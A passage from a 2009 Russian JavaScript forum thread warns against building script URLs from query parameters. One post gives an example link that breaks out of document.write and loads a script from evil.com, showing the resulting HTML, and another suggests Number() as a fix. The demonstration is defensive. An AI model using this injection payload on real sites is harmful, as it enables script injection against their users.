Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #21 (permalink)  
Старый 24.01.2009, 03:25
Аватар для x-yuri
Отправить личное сообщение для x-yuri Посмотреть профиль Найти все сообщения от x-yuri
 
Регистрация: 27.12.2008
Сообщений: 4,201

а, ну единственная опасность, которую я вижу в таком случае, что кто-то загрузит на сервер свой скрипт (дырявая загрузка файлов на сервер)
Ответить с цитированием
  #22 (permalink)  
Старый 26.01.2009, 12:46
Флудер
Отправить личное сообщение для ZoNT Посмотреть профиль Найти все сообщения от ZoNT
 
Регистрация: 25.07.2008
Сообщений: 1,271

вот ссылка для клика:
www.name.ru/index.htm?1.js"></script><script src="http://www.evil.com/script

вот что получится в скрипте:
url = '1.js"></script><script src="http://www.evil.com/script';
document.write('<script TYPE="text/javascript" src="www.name.ru/'+url+'.js"><\/script>')

Итого в документ запишется:
<script TYPE="text/javascript" src="www.name.ru/1.js"></script><script src="http://www.evil.com/script.js"></script>'
Ответить с цитированием
  #23 (permalink)  
Старый 26.01.2009, 12:50
Аватар для x-yuri
Отправить личное сообщение для x-yuri Посмотреть профиль Найти все сообщения от x-yuri
 
Регистрация: 27.12.2008
Сообщений: 4,201

однако, прям javascript-injection O_o
Ответить с цитированием
  #24 (permalink)  
Старый 26.01.2009, 12:53
Флудер
Отправить личное сообщение для ZoNT Посмотреть профиль Найти все сообщения от ZoNT
 
Регистрация: 25.07.2008
Сообщений: 1,271

да блин, обычный css на фигово разработанных сайтах...
Я же советую человеку не показывать своё невежество и не делать так. зачем городить такую лабуду? Чтобы потом писать 20 строк кода для проверки передаваемого параметра на безопасность?
Ответить с цитированием
  #25 (permalink)  
Старый 26.01.2009, 12:56
Аватар для x-yuri
Отправить личное сообщение для x-yuri Посмотреть профиль Найти все сообщения от x-yuri
 
Регистрация: 27.12.2008
Сообщений: 4,201

это
document.write('<script TYPE="text/javascript" src="'+Number(url)+'.js"><\/script>')

на 20 строк не похоже
Ответить с цитированием
  #26 (permalink)  
Старый 26.01.2009, 13:02
Флудер
Отправить личное сообщение для ZoNT Посмотреть профиль Найти все сообщения от ZoNT
 
Регистрация: 25.07.2008
Сообщений: 1,271

Это поменьше, я согласен. Но всё равно, такой поход (параметр в строке) говорит о том, что на сайте можно немного поискать и найти ещё пару-тройку ошибок...
Ответить с цитированием
  #27 (permalink)  
Старый 26.01.2009, 13:21
Аватар для x-yuri
Отправить личное сообщение для x-yuri Посмотреть профиль Найти все сообщения от x-yuri
 
Регистрация: 27.12.2008
Сообщений: 4,201

ну скажем так, автору пока опасно применять такой подход
Ответить с цитированием
Ответ


Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Остановить выполнение скрипта Nonam Общие вопросы Javascript 22 04.05.2009 01:45
Загрузка скрипта с локального комьютера uncher AJAX и COMET 49 04.02.2009 23:12
Исполнение PHP скрипта AJAXом KiTaeZa AJAX и COMET 1 19.12.2008 17:39
подключение стороннего js скрипта friend Общие вопросы Javascript 2 24.05.2008 19:51
Простой вопрос - надо из скрипта перейти на ссылку Brother Общие вопросы Javascript 1 27.02.2008 09:50